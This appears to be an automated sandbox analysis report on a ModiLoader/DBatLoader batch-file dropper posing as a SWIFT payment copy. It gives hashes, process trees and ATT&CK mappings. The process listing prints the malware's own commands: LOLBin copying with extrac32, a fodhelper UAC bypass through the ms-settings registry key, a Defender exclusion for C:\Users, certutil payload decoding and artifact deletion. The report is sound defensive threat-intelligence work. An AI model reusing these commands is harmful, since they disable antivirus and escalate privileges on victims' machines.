modiloader | 7d881f1bb1a442fbdc2eb1ce15e67bd8b891695029b9e51ea7249fe164dc907a

General

Target

Swift Payment Copy USD20,000.00.bat
Size

2.6MB
MD5

27e2b004580551fed5ba3913b5822db2
SHA1

433160f0c98bb1834c306537045670bab9f0904b
SHA256

7d881f1bb1a442fbdc2eb1ce15e67bd8b891695029b9e51ea7249fe164dc907a
SHA512

a7239e36f0e9206a48b388e3de388a3caa28499c79e85cd9440b9382d869169564ac6098fddef8cf50cd34051e741b57b88f30f18186b071b07d900893f31453
SSDEEP

24576:y4OFE//5zvMYNepZRuIQXZQ2FiBvmcH/Y+tOGlhjFk99Qk:piAtvpcqXZQ2sIOA4OGlhjFk99x

Score

10^/10

modiloader trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/576-54-0x0000000002C60000-0x0000000003C60000-memory.dmp	modiloader_stage2

Executes dropped EXE 16 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2496	alpha.exe
2796	alpha.exe
2552	alpha.exe
2976	xkn.exe
2420	alpha.exe
2684	alpha.exe
1328	kn.exe
928	alpha.exe
908	kn.exe
576	Lewxa.com
672	alpha.exe
2736	alpha.exe
2740	alpha.exe
2852	alpha.exe
2900	alpha.exe
628	alpha.exe

Loads dropped DLL 9 IoCs

Processes:

cmd.exealpha.exexkn.exealpha.exeWerFault.exe

pid process

2768 cmd.exe
2768 cmd.exe
2768 cmd.exe
2552 alpha.exe
2976 xkn.exe
2976 xkn.exe
2684 alpha.exe
1044 WerFault.exe
1044 WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1044 576 WerFault.exe Lewxa.com
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2888 taskkill.exe
752 taskkill.exe

pid	process
2768	cmd.exe
2768	cmd.exe
2768	cmd.exe
2552	alpha.exe
2976	xkn.exe
2976	xkn.exe
2684	alpha.exe
1044	WerFault.exe
1044	WerFault.exe

pid	pid_target	process	target process
1044	576	WerFault.exe	Lewxa.com

pid	process
2888	taskkill.exe
752	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2860 reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Lewxa.com

pid process

576 Lewxa.com
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2976 xkn.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2976 xkn.exe
Token: SeDebugPrivilege 2888 taskkill.exe
Token: SeDebugPrivilege 752 taskkill.exe

pid	process
2860	reg.exe

pid	process
576	Lewxa.com

pid	process
2976	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2976	xkn.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2768 wrote to memory of 3028	2768	cmd.exe	cmd.exe
PID 2768 wrote to memory of 3028	2768	cmd.exe	cmd.exe
PID 2768 wrote to memory of 3028	2768	cmd.exe	cmd.exe
PID 3028 wrote to memory of 2956	3028	cmd.exe	extrac32.exe
PID 3028 wrote to memory of 2956	3028	cmd.exe	extrac32.exe
PID 3028 wrote to memory of 2956	3028	cmd.exe	extrac32.exe
PID 2768 wrote to memory of 2496	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2496	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2496	2768	cmd.exe	alpha.exe
PID 2496 wrote to memory of 2588	2496	alpha.exe	extrac32.exe
PID 2496 wrote to memory of 2588	2496	alpha.exe	extrac32.exe
PID 2496 wrote to memory of 2588	2496	alpha.exe	extrac32.exe
PID 2768 wrote to memory of 2796	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2796	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2796	2768	cmd.exe	alpha.exe
PID 2796 wrote to memory of 2452	2796	alpha.exe	extrac32.exe
PID 2796 wrote to memory of 2452	2796	alpha.exe	extrac32.exe
PID 2796 wrote to memory of 2452	2796	alpha.exe	extrac32.exe
PID 2768 wrote to memory of 2552	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2552	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2552	2768	cmd.exe	alpha.exe
PID 2552 wrote to memory of 2976	2552	alpha.exe	xkn.exe
PID 2552 wrote to memory of 2976	2552	alpha.exe	xkn.exe
PID 2552 wrote to memory of 2976	2552	alpha.exe	xkn.exe
PID 2976 wrote to memory of 2420	2976	xkn.exe	alpha.exe
PID 2976 wrote to memory of 2420	2976	xkn.exe	alpha.exe
PID 2976 wrote to memory of 2420	2976	xkn.exe	alpha.exe
PID 2420 wrote to memory of 2860	2420	alpha.exe	reg.exe
PID 2420 wrote to memory of 2860	2420	alpha.exe	reg.exe
PID 2420 wrote to memory of 2860	2420	alpha.exe	reg.exe
PID 2768 wrote to memory of 2684	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2684	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2684	2768	cmd.exe	alpha.exe
PID 2684 wrote to memory of 1328	2684	alpha.exe	kn.exe
PID 2684 wrote to memory of 1328	2684	alpha.exe	kn.exe
PID 2684 wrote to memory of 1328	2684	alpha.exe	kn.exe
PID 2768 wrote to memory of 928	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 928	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 928	2768	cmd.exe	alpha.exe
PID 928 wrote to memory of 908	928	alpha.exe	kn.exe
PID 928 wrote to memory of 908	928	alpha.exe	kn.exe
PID 928 wrote to memory of 908	928	alpha.exe	kn.exe
PID 2768 wrote to memory of 576	2768	cmd.exe	Lewxa.com
PID 2768 wrote to memory of 576	2768	cmd.exe	Lewxa.com
PID 2768 wrote to memory of 576	2768	cmd.exe	Lewxa.com
PID 2768 wrote to memory of 576	2768	cmd.exe	Lewxa.com
PID 2768 wrote to memory of 672	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 672	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 672	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2736	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2736	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2736	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2740	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2740	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2740	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2852	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2852	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2852	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2900	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2900	2768	cmd.exe	alpha.exe
PID 2768 wrote to memory of 2900	2768	cmd.exe	alpha.exe
PID 2900 wrote to memory of 2888	2900	alpha.exe	taskkill.exe
PID 2900 wrote to memory of 2888	2900	alpha.exe	taskkill.exe
PID 2900 wrote to memory of 2888	2900	alpha.exe	taskkill.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Swift Payment Copy USD20,000.00.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2768

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:2956

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:2588

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2452

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2552

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2976

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:2860

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Swift Payment Copy USD20,000.00.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2684

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Swift Payment Copy USD20,000.00.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:1328

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:928

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:908

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 740
3⤵
- Loads dropped DLL
- Program crash
PID:1044

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:672

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2736

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2740

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2852

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2900

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2888

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
PID:628

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Lewxa.txt

Filesize
1.9MB

MD5
ebc0f4956eb495835d78cccf506bacda

SHA1
59c0d14657f98f60ed121c842e10d68434690de7

SHA256
850e3a6656ceb8e29fb4eb7fec103f8413f7338011e750fd1acabb8dde1c355a

SHA512
1012ff20eae261208fe366408853d602a0e9befba85d0c1c64f76ea3c12d08d4990d7c38216b186ccd26d8a86e3495ffc6f45cc44e9fe356987715702d49b840

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
955KB

MD5
0eec5660338db7b5de48096339539571

SHA1
30be6048f0c5b8aefef81e11193ab20f44991923

SHA256
bb48d576e589f33983b22ff5f87c15876f10e7d126f67853cf57f4e5916de142

SHA512
df59442fca3801b39c1fe2e8e3ee97ca74e5ad3fef82033d4f46dc1f2bf84c3df2494391cb31f3a9d942d69e5f6c87a830be3770d46755a59a362ac2812354b8

Download Submit
C:\Users\Public\kn.exe

Filesize
129KB

MD5
eeeb3ab6c25e927705d7d328e7b8074e

SHA1
4e62bb0141043e071ad7878957e72fc0487cd912

SHA256
f2b4a0980f1d4cb13ffb6b6240c602fa80acc2ba6ccc6902e904a7bf2b980e47

SHA512
c0c1d11dd9492123be7a8a7fbf5778c4366f1e995993000e15b5ee25481a4a5aae49ad83c2fa759f0857764ba11641061f850d6c31eae38e4143930cd5600e46

Download Submit
C:\Users\Public\kn.exe

Filesize
406KB

MD5
7fe908127e8b3bf1bdabb5c13793616e

SHA1
b833c791f1f967b6d377056f8d5481ff256dfca3

SHA256
70aa0e08f09bbb11b3007b896c5c7025f986e35c8e774458143c7fa607a804a2

SHA512
5f1a55cc3b2d4c493f585897f014e53e299ae108d6091a062f98fab1d406b3d7d48aa0e0d45996692cf55887a455be7cc0a1ea2de1049a589874e3b1e1569cfd

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/576-46-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/576-53-0x0000000002C60000-0x0000000003C60000-memory.dmp

Filesize
16.0MB

Download
memory/576-54-0x0000000002C60000-0x0000000003C60000-memory.dmp

Filesize
16.0MB

Download
memory/576-57-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/576-58-0x0000000000400000-0x00000000004F8000-memory.dmp

Filesize
992KB

Download
memory/2976-27-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2976-32-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2976-26-0x0000000002210000-0x0000000002218000-memory.dmp

Filesize
32KB

Download
memory/2976-25-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2976-24-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2976-23-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2976-22-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2976-21-0x000000001B0B0000-0x000000001B392000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads